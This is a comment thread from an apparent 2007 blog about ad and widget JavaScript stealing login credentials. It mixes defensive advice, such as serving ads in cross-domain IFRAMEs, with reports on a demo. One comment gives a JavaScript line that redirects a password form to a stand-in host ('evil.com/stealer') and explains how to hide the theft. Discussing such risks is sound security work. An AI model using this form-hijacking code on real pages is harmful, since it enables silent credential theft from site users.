Comments on: Login page security issues
http://www.mikeonads.com/2007/05/31/login-page-security-issues/
Ramblings about online advertising, ad networks & other techie randomness
Feed last built: Wed, 28 May 2014 09:36:00 +0000

By: data recovery
Wed, 07 Mar 2012 07:04:00 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-147341

Great post, thank you

By: whooknew
Mon, 04 Jun 2007 05:12:56 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-1014

Just 10 minutes ago I was asking a friend about the security ramifications of widgets. He pointed me to your blog immediately. I’m not a programmer but I do know there are more people who use javascript/widgets that don’t understand code than those that do.

As most of us (non-programmers) just copy code and stick it into templates, I can foresee a very ugly phenomenon. Imagine an army of nasty widgets that collect different pieces of random information and another brain program that puts the info back together. I don’t know what could happen, but I’m sure it is not a good thing.

This could lead to very damaging software as the exponential viral effects are tremendous. I would assume that in the future widgets will be able to play with other widgets and thus several independent programs may run on the browser simultaneously. Maybe I don’t know what I’m talking about, but it seems possible.

Thoughts?

By: 3543244
Fri, 01 Jun 2007 17:06:44 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-984

As far as the other ways “the smarter guys out there” could do it, my JS would be more like:

document.getElementById('passform').action =
  'http://www.evil.com/stealer?goto=' +
  escape(document.getElementById('passform').action);

Where that “stealer” would record the submitted information and either invisibly redirect (for a GET form), or write out an invisible document with some javascript to submit it to the original location.

Only the closest observation would catch it. Especially if the name is more innocuous than “evil.com/stealer”.

By: David Weinstein
Fri, 01 Jun 2007 15:48:14 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-982

Another way to protect yourself from this sort of attack as a publisher is to only serve IFRAME ads (never javascript) and ensure that the domain serving the IFRAME content is different than the domain of the site where the ad is appearing. If you do this, you’ll always be safe from XSS attacks served via ads, since the browser’s security model will not let javascript in the child IFRAME read anything in the DOM on the parent when the domains don’t match.

As a sidenote: the insidious thing about XSS attacks served anonymously via an adserver is that there’s almost no way for the victim publisher to know that something like this is taking place. It’s a silent but deadly attack and it’s therefore very hard to get a handle on the scope of the problem.

By: yardley.ca / dash » Trust
Fri, 01 Jun 2007 13:04:59 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-976

[...] released a little demo that illustrates how an advertisement (or a widget, for that matter) provided by a third-party [...]

By: Mike
Fri, 01 Jun 2007 12:18:20 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-973

Seems I should do some cross-browser testing :).

Works in Firefox right now, and I’m sure I can get it to work in IE as well, might just need to do a bit of tweaking.

By: Sandi Hardmeier
Fri, 01 Jun 2007 10:50:20 +0000
http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-972

It didn’t work for me – the results in the popup were:

“I just stole your info, your username = undefined and your pass is Submit password”